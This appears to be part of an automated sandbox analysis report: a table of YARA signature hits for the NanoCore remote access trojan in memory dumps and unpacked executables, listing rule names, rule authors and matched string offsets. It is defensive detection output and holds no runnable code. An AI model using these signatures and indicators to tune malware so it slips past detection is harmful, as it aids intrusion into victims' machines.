0000000E.00000003.580975519.000000000363C000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x3c65d:$a: NanoCore 0x3c66d:$a: NanoCore 0x3c8a1:$a: NanoCore 0x3c8b5:$a: NanoCore 0x3c8f5:$a: NanoCore 0x3c6bc:$b: ClientPlugin 0x3c8be:$b: ClientPlugin 0x3c8fe:$b: ClientPlugin 0x3c7e3:$c: ProjectData 0x3d1ea:$d: DESCrypto 0x44bb6:$e: KeepAlive 0x10f44:$g: LogClientMessage 0x42ba4:$g: LogClientMessage 0x3ed9f:$i: get_Connected 0xbb1e:$j: #=q 0xbd9d:$j: #=q 0xcd59:$j: #=q 0xdc6f:$j: #=q 0xdc8b:$j: #=q 0xdcbb:$j: #=q 0xdcd7:$j: #=q
00000000.00000003.450818264.000000000391C000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xc0005:$x1: NanoCore.ClientPluginHost 0xc0042:$x2: IClientNetworkHost 0xdfef:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x3a2af:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x66187:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x9205f:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xc3b75:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xe9e0f:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000003.450818264.000000000391C000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000003.450818264.000000000391C000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xbfd6d:$a: NanoCore 0xbfd7d:$a: NanoCore 0xbffb1:$a: NanoCore 0xbffc5:$a: NanoCore 0xc0005:$a: NanoCore 0xbfdcc:$b: ClientPlugin 0xbffce:$b: ClientPlugin 0xc000e:$b: ClientPlugin 0xbfef3:$c: ProjectData 0xc08fa:$d: DESCrypto 0xc82c6:$e: KeepAlive 0x105e4:$g: LogClientMessage 0x3c8a4:$g: LogClientMessage 0x6877c:$g: LogClientMessage 0x94654:$g: LogClientMessage 0xc62b4:$g: LogClientMessage 0xec404:$g: LogClientMessage 0xc24af:$i: get_Connected 0xb1be:$j: #=q 0xb43d:$j: #=q 0xc3f9:$j: #=q
0000000D.00000002.616663037.00000000056F0000.00000004.00020000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
0000000D.00000002.616663037.00000000056F0000.00000004.00020000.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
00000000.00000003.466877574.00000000039B2000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x29195:$x1: NanoCore.ClientPluginHost 0x291d2:$x2: IClientNetworkHost 0x2cd05:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000003.466877574.00000000039B2000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000003.466877574.00000000039B2000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x28efd:$a: NanoCore 0x28f0d:$a: NanoCore 0x29141:$a: NanoCore 0x29155:$a: NanoCore 0x29195:$a: NanoCore 0x28f5c:$b: ClientPlugin 0x2915e:$b: ClientPlugin 0x2919e:$b: ClientPlugin 0x29083:$c: ProjectData 0x29a8a:$d: DESCrypto 0x31456:$e: KeepAlive 0x2f444:$g: LogClientMessage 0x2b63f:$i: get_Connected 0x29dc0:$j: #=q 0x29df0:$j: #=q 0x29e0c:$j: #=q 0x29e3c:$j: #=q 0x29e58:$j: #=q 0x29e74:$j: #=q 0x29ea4:$j: #=q 0x29ec0:$j: #=q
00000000.00000002.618062231.0000000003997000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x10195:$x1: NanoCore.ClientPluginHost 0x44195:$x1: NanoCore.ClientPluginHost 0x101d2:$x2: IClientNetworkHost 0x441d2:$x2: IClientNetworkHost 0x13d05:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x47d05:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000002.618062231.0000000003997000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000002.618062231.0000000003997000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfefd:$a: NanoCore 0xff0d:$a: NanoCore 0x10141:$a: NanoCore 0x10155:$a: NanoCore 0x10195:$a: NanoCore 0x43efd:$a: NanoCore 0x43f0d:$a: NanoCore 0x44141:$a: NanoCore 0x44155:$a: NanoCore 0x44195:$a: NanoCore 0xff5c:$b: ClientPlugin 0x1015e:$b: ClientPlugin 0x1019e:$b: ClientPlugin 0x43f5c:$b: ClientPlugin 0x4415e:$b: ClientPlugin 0x4419e:$b: ClientPlugin 0x10083:$c: ProjectData 0x44083:$c: ProjectData 0x10a8a:$d: DESCrypto 0x44a8a:$d: DESCrypto 0x18456:$e: KeepAlive
00000000.00000002.618678183.0000000004910000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x101d5:$x1: NanoCore.ClientPluginHost 0x42fdd:$x1: NanoCore.ClientPluginHost 0x10212:$x2: IClientNetworkHost 0x4301a:$x2: IClientNetworkHost 0x13d45:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x46b4d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000002.618678183.0000000004910000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000002.618678183.0000000004910000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xff3d:$a: NanoCore 0xff4d:$a: NanoCore 0x10181:$a: NanoCore 0x10195:$a: NanoCore 0x101d5:$a: NanoCore 0x42d45:$a: NanoCore 0x42d55:$a: NanoCore 0x42f89:$a: NanoCore 0x42f9d:$a: NanoCore 0x42fdd:$a: NanoCore 0xff9c:$b: ClientPlugin 0x1019e:$b: ClientPlugin 0x101de:$b: ClientPlugin 0x42da4:$b: ClientPlugin 0x42fa6:$b: ClientPlugin 0x42fe6:$b: ClientPlugin 0x100c3:$c: ProjectData 0x42ecb:$c: ProjectData 0x10aca:$d: DESCrypto 0x438d2:$d: DESCrypto 0x18496:$e: KeepAlive
Process Memory Space: wIQLBHYbqz.exe PID: 4904	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4e638:$x1: NanoCore.ClientPluginHost 0x4e675:$x2: IClientNetworkHost 0x4040f:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x413c3:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x5a1c0:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x660ea:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x85cca:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xb3e89:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xd171b:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xe08ad:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xecb21:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x1016d6:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x10cabb:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x12065c:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x12b9cf:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x151b57:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: wIQLBHYbqz.exe PID: 4904	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: wIQLBHYbqz.exe PID: 4904	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x3bbfa:$a: NanoCore 0x4e332:$a: NanoCore 0x4e342:$a: NanoCore 0x4e3dd:$a: NanoCore 0x4e3ec:$a: NanoCore 0x4e5e4:$a: NanoCore 0x4e5f8:$a: NanoCore 0x4e638:$a: NanoCore 0x5682a:$a: NanoCore 0x5683c:$a: NanoCore 0x56878:$a: NanoCore 0x62754:$a: NanoCore 0x62766:$a: NanoCore 0x627a2:$a: NanoCore 0x82334:$a: NanoCore 0x82346:$a: NanoCore 0x82382:$a: NanoCore 0xb04f3:$a: NanoCore 0xb0505:$a: NanoCore 0xb0541:$a: NanoCore 0xcdd85:$a: NanoCore
Process Memory Space: RegAsm.exe PID: 4936	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x3694:$x1: NanoCore.ClientPluginHost 0x36c1:$x2: IClientNetworkHost 0x2b386:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x35f59:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: RegAsm.exe PID: 4936	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: RegAsm.exe PID: 4936	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x364a:$a: NanoCore 0x365f:$a: NanoCore 0x3694:$a: NanoCore 0x8816:$a: NanoCore 0x8829:$a: NanoCore 0x885b:$a: NanoCore 0x11731:$a: NanoCore 0x118c6:$a: NanoCore 0x118da:$a: NanoCore 0x27e9f:$a: NanoCore 0x27eae:$a: NanoCore 0x325c3:$a: NanoCore 0x325d5:$a: NanoCore 0x32611:$a: NanoCore 0x657cc:$a: NanoCore 0x67588:$a: NanoCore 0x6779c:$a: NanoCore 0x677ef:$a: NanoCore 0x67828:$a: NanoCore 0x6789b:$a: NanoCore 0x6876e:$a: NanoCore
Process Memory Space: RMActivate_isv.exe.bat PID: 6788	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf49f:$x1: NanoCore.ClientPluginHost 0xf4dc:$x2: IClientNetworkHost 0x12fcd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x1e053:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x2b92f:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x39884:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x4f4a3:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x76d78:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x82dcb:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x8e13e:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x994b1:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xb2436:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xd7c57:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0xe301d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: RMActivate_isv.exe.bat PID: 6788	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: RMActivate_isv.exe.bat PID: 6788	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xf16c:$a: NanoCore 0xf17c:$a: NanoCore 0xf23b:$a: NanoCore 0xf24a:$a: NanoCore 0xf44b:$a: NanoCore 0xf45f:$a: NanoCore 0xf49f:$a: NanoCore 0x1a6bd:$a: NanoCore 0x1a6cf:$a: NanoCore 0x1a70b:$a: NanoCore 0x27156:$a: NanoCore 0x35eee:$a: NanoCore 0x35f00:$a: NanoCore 0x35f3c:$a: NanoCore 0x4bb0d:$a: NanoCore 0x4bb1f:$a: NanoCore 0x4bb5b:$a: NanoCore 0x733e2:$a: NanoCore 0x733f4:$a: NanoCore 0x73430:$a: NanoCore 0x7f435:$a: NanoCore
Process Memory Space: RegAsm.exe PID: 7040	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd254:$x1: NanoCore.ClientPluginHost 0xd26e:$x2: IClientNetworkHost 0x1c053:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x26b83:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: RegAsm.exe PID: 7040	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: RegAsm.exe PID: 7040	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x3aa4:$a: NanoCore 0x3b12:$a: NanoCore 0x3ba1:$a: NanoCore 0xd1be:$a: NanoCore 0xd217:$a: NanoCore 0xd254:$a: NanoCore 0xd2cd:$a: NanoCore 0xda59:$a: NanoCore 0xdaac:$a: NanoCore 0xdae5:$a: NanoCore 0xdb58:$a: NanoCore 0xe812:$a: NanoCore 0xe89f:$a: NanoCore 0x18889:$a: NanoCore 0x188f3:$a: NanoCore 0x18902:$a: NanoCore 0x231ed:$a: NanoCore 0x231ff:$a: NanoCore 0x2323b:$a: NanoCore 0x3915f:$a: NanoCore 0x39172:$a: NanoCore
Click to see the 78 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
22.2.RegAsm.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
22.2.RegAsm.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
22.2.RegAsm.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
22.2.RegAsm.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
13.2.RegAsm.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
13.2.RegAsm.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
13.2.RegAsm.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
13.2.RegAsm.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
0.3.wIQLBHYbqz.exe.39cbe78.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.3.wIQLBHYbqz.exe.39cbe78.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
0.3.wIQLBHYbqz.exe.39cbe78.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.3.wIQLBHYbqz.exe.39cbe78.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
0.2.wIQLBHYbqz.exe.39cb008.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.wIQLBHYbqz.exe.39cb008.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
0.2.wIQLBHYbqz.exe.39cb008.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.wIQLBHYbqz.exe.39cb008.4.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
13.2.RegAsm.exe.56f0000.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
13.2.RegAsm.exe.56f0000.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
13.2.RegAsm.exe.5b70000.6.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
13.2.RegAsm.exe.5b70000.6.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
13.2.RegAsm.exe.5b70000.6.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.3.RMActivate_isv.exe.bat.3668768.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
14.3.RMActivate_isv.exe.bat.3668768.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
14.3.RMActivate_isv.exe.bat.3668768.2.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
14.3.RMActivate_isv.exe.bat.3668768.2.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
13.2.RegAsm.exe.5b74629.7.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost
13.2.RegAsm.exe.5b74629.7.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost
13.2.RegAsm.exe.5b74629.7.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
22.2.RegAsm.exe.40d2a4d.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0x23c40:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost 0x23c6d:$x2: IClientNetworkHost
22.2.RegAsm.exe.40d2a4d.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0x23c40:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0x24d1b:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost 0x23c5a:$s5: IClientLoggingHost
22.2.RegAsm.exe.40d2a4d.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
22.2.RegAsm.exe.40ce424.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
22.2.RegAsm.exe.40ce424.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
22.2.RegAsm.exe.40ce424.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
13.2.RegAsm.exe.42495ee.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0x145e3:$x1: NanoCore.ClientPluginHost 0x2d09f:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost 0x14610:$x2: IClientNetworkHost 0x2d0cc:$x2: IClientNetworkHost
13.2.RegAsm.exe.42495ee.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x145e3:$x2: NanoCore.ClientPluginHost 0x2d09f:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0x156be:$s4: PipeCreated 0x2e17a:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost 0x145fd:$s5: IClientLoggingHost 0x2d0b9:$s5: IClientLoggingHost
13.2.RegAsm.exe.42495ee.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
13.2.RegAsm.exe.42495ee.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xddf:$a: NanoCore 0xe38:$a: NanoCore 0xe75:$a: NanoCore 0xeee:$a: NanoCore 0x14599:$a: NanoCore 0x145ae:$a: NanoCore 0x145e3:$a: NanoCore 0x2d055:$a: NanoCore 0x2d06a:$a: NanoCore 0x2d09f:$a: NanoCore 0xe41:$b: ClientPlugin 0xe7e:$b: ClientPlugin 0x177c:$b: ClientPlugin 0x1789:$b: ClientPlugin 0x14355:$b: ClientPlugin 0x14370:$b: ClientPlugin 0x143a0:$b: ClientPlugin 0x145b7:$b: ClientPlugin 0x145ec:$b: ClientPlugin 0x2ce11:$b: ClientPlugin 0x2ce2c:$b: ClientPlugin
